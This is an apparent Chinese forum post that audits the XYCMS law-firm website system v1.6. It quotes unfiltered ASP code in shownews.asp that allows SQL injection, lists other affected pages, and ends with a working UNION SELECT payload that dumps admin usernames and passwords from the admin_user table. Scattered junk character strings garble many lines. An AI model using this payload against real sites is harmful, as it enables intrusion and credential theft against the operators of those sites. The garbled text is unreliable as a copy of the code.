前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似/ n% H/ P% s' m2 ~
( j. F" b4 h! O0 a1 P
淫荡分割线
f4 {' h0 H+ W, J--------------------------------------------------------! @* z& ]" y; \& H" f
) R( S! k6 V9 x, f/ C T$ h审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)" U3 i" f, u) Z$ I1 i
源码地址:http://down.chinaz.com/soft/29233.htm% N* D# Q& u0 S! ?7 V0 T) @) [
* j9 O) S+ z. M
漏洞文件:shownews.asp0 R! ] `. ]( d: E& w8 z" z
漏洞代码:7-13行6 Y1 f8 b" z3 O7 ~7 n
0 f9 u9 L$ W; ~$ V; i
; G( F, E; w" m- T<% + N1 S( M5 z+ m; Z
id=request.QueryString("id")+ R. x; ], i& f' ]! e( l4 z
1 w+ J1 N( }* [- r, j" y; E5 G: Oset snews=server.createobject("adodb.recordset")
) Y- k0 s& d8 E4 A; nexec="select * from [news] where id="&id
. B& U" w& l" F7 H1 x1 rsnews.open exec,conn,1,1; u5 v0 _; g$ B4 J: X
%>
3 J" E1 H# U# @2 C
% t c# r7 d4 ?8 m0 V, P( v2 z " i( B" z! a5 P$ I
什么过滤都没有 直造成注入8 }$ x5 B6 c, L1 U- M0 ?" ]
4 f6 Q) H" V' q
注入点:http://127.0.0.1:99/shownews.asp?id=xx
( R) m6 q9 x* P8 @ y6 H9 _
: R& K! J3 o7 G8 X; ?8 \其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
% [7 s5 J( D0 k0 k* d : }& A& C% u( ]$ B; ~
$ N: ^0 J2 Y/ \- U
exp: union select 1,admin,password,4,5,7 from admin_user# t4 Q7 d- o/ E- m
7 t- p A% h. E: E2 N! V+ e
|